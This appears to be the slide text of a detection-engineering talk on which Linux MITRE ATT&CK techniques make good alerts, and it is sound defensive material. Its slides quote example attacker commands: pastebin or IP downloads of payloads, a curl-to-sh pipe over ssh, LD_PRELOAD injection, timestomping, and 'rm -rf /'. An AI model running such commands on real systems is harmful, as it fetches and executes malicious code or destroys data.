This document discusses alertable techniques for Linux using MITRE ATT&CK. It defines what an alertable technique is and criteria for deciding when to generate alerts. Several specific techniques are discussed such as timestomping, process injection, and masquerading, with analysis of whether they make good candidates for alerts based on investigation time, significance, and response time. Poor candidates for alerts are also identified, such as discovery commands, sudo, and file deletion. The document concludes by recommending alerting where possible and reporting or hunting otherwise, and provides resources for further information.

1. Alertable Techniques
for Linux Using
MITRE ATT&CK™

2. ▪ Find & detect adversaries using data
▪ Recovering system administrator
▪ Love to teach, hate to grade homework
Tony Lambert
Detection Engineer/Intel
Red Canary
@ForensicITGuy
id -un

3. ▪ What’s an alertable technique?
▪ Decision criteria for alerting
▪ The good, the bad, and the ugly
Overview

4. ▪ Notification of abnormal condition
▪ Requires context for triage
▪ Requires care and feeding for efficacy
What’s an alert?

5. Alert Workflow
Condition
occurs
1
Defender
investigates
2 3 4
Alert fires
Escalate or hide

6. ▪ High volume by default
▪ Lack of context
Problems with Alerts

7. Decision Criteria for Alerts
▪ Time to investigate (lower is better)
▪ Significance of abnormality (urgent is better)
▪ Time to respond (lower is better)

8. Alerts that don’t suck

9. Timestomping (T1099)
touch -acmr /bin/sh /file/to/timestomp
▪ Quick to investigate
▪ Significant destruction of evidence

10. Process Injection (T1055)
/etc/ld.so.preload
LD_PRELOAD=/tmp/evil.so
▪ Quick to respond
▪ Used by rootkits, affects user tools

11. Masquerading (T1036)
/tmp/kworkerds
/dev/shm/kthreadds
▪ Quick to investigate
▪ Signals significant abnormality

12. We can make these
work...

13. Remote File Copy (T1105)
curl https://pastebin.com/evilThing
wget http://<ip address>/mirai.x86
▪ Requires much tuning
▪ Hunt for outliers in command line

14. Remote Services (T1021)
ssh … user@192.168.2.1 '(curl
hxxps://pastebin.com/payload | sh'
▪ Tune out deployment tools
▪ Significant for lateral movement

15. Worst. Alerts. Ever.

16. Anything Discovery
whoami, netstat, ifconfig, etc.
▪ OS noise makes high volume
▪ Better for cluster analysis

17. Sudo (T1169)
sudo ./make_sandwich.sh
▪ Long investigations with little return
▪ Better for reporting/audits

18. File Deletion (T1107)
rm -rf /
▪ Probably non-functional rule
▪ Helpdesk will know before the alert

19. Alert where possible,
report/hunt otherwise
REDCANARY.COM/BLOG

20. Q & A
https://github.com/bfuzzy1/auditd-attack
https://github.com/Neo23x0/auditd
RESOURCES